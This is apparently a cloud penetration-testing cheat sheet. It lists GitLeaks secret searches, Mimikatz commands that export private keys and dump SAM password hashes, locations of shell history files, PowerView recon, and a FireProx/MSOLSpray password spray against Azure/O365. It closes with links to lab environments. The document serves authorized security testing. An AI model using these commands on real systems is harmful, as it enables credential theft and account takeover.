Cloud Pen-testing Part -6
## GitLeaks
Search repositories for secrets
https://github.com/zricethezav/gitleaks
Pull GitLeaks with Docker
```shell
sudo docker pull zricethezav/gitleaks
Print the help menu
sudo docker run --rm --name=gitleaks zricethezav/gitleaks --help
Use GitLeaks to search for secrets
sudo docker run --rm --name=gitleaks zricethezav/gitleaks -v -r <repo URL>
Mimikatz
Export Non-Exportable Private Keys From Web Server
mimikatz# crypto::capi
mimikatz# privilege::debug
mimikatz# crypto::cng
mimikatz# crypto::certificates /systemstore:local_machine /store:my /export
Dump password hashes from SAM/SYSTEM files
mimikatz# lsadump::sam /system:SYSTEM /sam:SAM
Check Command History
Linux Bash History Location
~/.bash_history
Windows PowerShell PSReadLine Location
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PowerView
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
Find on-prem ADConnect account name and server
Get-NetUser -Filter "(samAccountName=MSOL_*)" | Select-Object name,description | fl
FireProx
Password Spraying Azure/O365 while randomizing IPs with FireProx
Install
git clone https://github.com/ustayready/fireprox
cd fireprox
virtualenv -p python3 .
source bin/activate
pip install -r requirements.txt
python fire.py
Launch FireProx
python fire.py --access_key <access_key_id> --secret_access_key <secret_access_key> --region <region> --url https://login.microsoft.com --command create
Password spray using FireProx + MSOLSpray
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020 -URL https://apigateway-endpoint-id.execute-api.us-east-1.amazonaws.com/fireprox
ip2Provider
Check a list of IP addresses against cloud provider IP space
https://github.com/oldrho/ip2provider
Vulnerable Infrastructure Creation
Cloudgoat - https://github.com/RhinoSecurityLabs/cloudgoat
SadCloud - https://github.com/nccgroup/sadcloud
Flaws Cloud - http://flaws.cloud
Thunder CTF - http://thunder-ctf.cloud
References and Resources
This is a list of references and resources that I leveraged to create the cheatsheets, but it is not comprehensive.
Huge thanks to all the cloud pentesting blog/book authors & open-source developers!
Rhino Security Labs @RhinoSecurity - Blog - Rhino Security Labs
Matt Burrough @mattburrough - Pentesting Azure Applications | No Starch Press
NCC Group @NCCGroupInfoSec - NCC Group Plc · GitHub
Sean Metcalf @PyroTek3 & Trimarc - AD Security
Karl Fosaaen @kfosaaen & NETSPI - NetSPI Blog
Ryan Hausknecht @haus3c & SpectorOps - Posts By SpecterOps Team Members
Steve Borosh @424f424f - rvrsh3ll Blog
Dirk-jan Mollema @_dirkjan - dirkjanm.io
Mike Felch @ustayready - ustayready (ustayready) · GitHub
Zachary Rice (@zricethezav) - zricethezav (Zachary Rice) · GitHub
Adam Chester @xpn - XPN InfoSec Blog
Chris Moberly @init_string & Gitlab - GitLab Security Department · GitLab
Lee Kagan @invokethreatguy & Lares - Blog | Resources | Lares Consulting, LLC
Oddvar Moe @Oddvarmoe & TrustedSec - Cybersecurity Education from the Experts | TrustedSec Blog Posts
Please note that the above information is provided for reference purposes. Make sure to review and use these tools responsibly and ethically within the boundaries of applicable laws and regulations.